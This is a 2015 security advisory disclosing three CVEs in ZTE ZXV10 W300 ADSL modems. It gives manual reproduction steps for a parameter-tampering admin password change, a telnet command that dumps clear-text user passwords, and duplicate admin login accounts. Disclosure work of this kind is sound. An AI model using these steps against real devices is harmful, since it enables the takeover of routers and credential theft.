ZTE ADSL ZXV10 W300 Authorization / Disclosure / Backdoor
Posted on 21 November 2015
# Exploit Title: [ZTE ADSL ZXV10 W300 modems - Multiple vulnerabilities] # Discovered by: Karn Ganeshen # Vendor Homepage: [www.zte.com.cn] # Versions Reported: [W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57] *CVE-ID*: CVE-2015-7257 CVE-2015-7258 CVE-2015-7259 *Note*: Large deployment size, primarily in Peru, used by TdP. 1 *Insufficient authorization controls* *CVE-ID*: CVE-2015-7257 Observed in Password Change functionality. Other functions may be vulnerable as well. *Expected behavior:* Only administrative 'admin' user should be able to change password for all the device users. 'support' is a diagnostic user with restricted privileges. It can change only its own password. *Vulnerability:* Any non-admin user can change 'admin' password. *Steps to reproduce:* a. Login as user 'support' password XXX b. Access Password Change page - http://<IP>/password.htm c. Submit request d. Intercept and Tamper the parameter username change from 'support' to 'admin' e. Enter the new password > old password is not requested > Submit > Login as admin -> Pwn! 2 *Sensitive information disclosure - clear-text passwords* *CVE-ID*: CVE-2015-7258 Displaying user information over Telnet connection, shows all valid users and their passwords in clear-text. *Steps to reproduce:* $ telnet <IP> Trying <IP>... Connected to <IP>. Escape character is '^]'. User Access Verification Username: admin Password: < admin/XXX1 $sh ADSL#login show <-- shows user information Username Password Priority admin password1 2 support password2 0 admin password3 1 3 *(Potential) Backdoor account feature - **insecure account management* *CVE-ID*: CVE-2015-7259 Same login account can exist on the device, multiple times, each with different priority#. It is possible to log in to device with either of the username/password combination. It is considered as a (redundant) login support *feature*. *Steps to reproduce:* $ telnet <IP> Trying <IP>... Connected to <IP>. Escape character is '^]'. User Access Verification User Access Verification Username: admin Password: <-- admin/password3 $sh ADSL#login show Username Password Priority admin password1 2 support password2 0 admin password3 1 +++++ -- Best Regards, Karn Ganeshen